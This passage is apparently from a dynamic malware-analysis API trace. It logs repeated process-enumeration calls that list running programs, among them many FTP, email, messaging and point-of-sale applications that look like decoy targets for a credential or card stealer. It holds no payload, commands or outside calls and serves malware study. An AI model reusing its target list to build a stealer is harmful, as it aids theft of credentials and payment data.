lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0211.327] CloseHandle (hObject=0x11cc) returned 1 [0211.327] Sleep (dwMilliseconds=0x64) [0211.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0211.468] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.470] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.471] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.473] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.474] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.476] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.478] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.479] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.483] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.484] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.486] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.487] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.488] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.490] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.496] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.498] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.499] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.500] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.502] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.503] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.504] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0211.506] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0211.507] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.508] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.510] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.514] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0211.515] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0211.517] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0211.518] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.520] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.521] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.523] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.524] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.535] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0211.537] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0211.538] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0211.540] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0211.541] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0211.627] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0211.629] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0211.631] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0211.633] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0211.634] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0211.636] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0211.639] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0211.641] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0211.642] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0211.644] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0211.645] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0211.646] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0211.648] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0211.649] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0211.653] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0211.654] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0211.656] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0211.658] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0211.659] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0211.661] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0211.662] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0211.664] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0211.666] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0211.750] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0211.752] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0211.754] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0211.756] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0211.758] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0211.765] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0211.768] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0211.770] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0211.772] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0211.775] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0211.781] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0211.783] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0211.786] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0211.788] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0211.791] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0211.845] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0211.847] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0211.850] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0211.852] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0211.855] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0211.860] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0211.862] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0211.865] Process32Next (in: 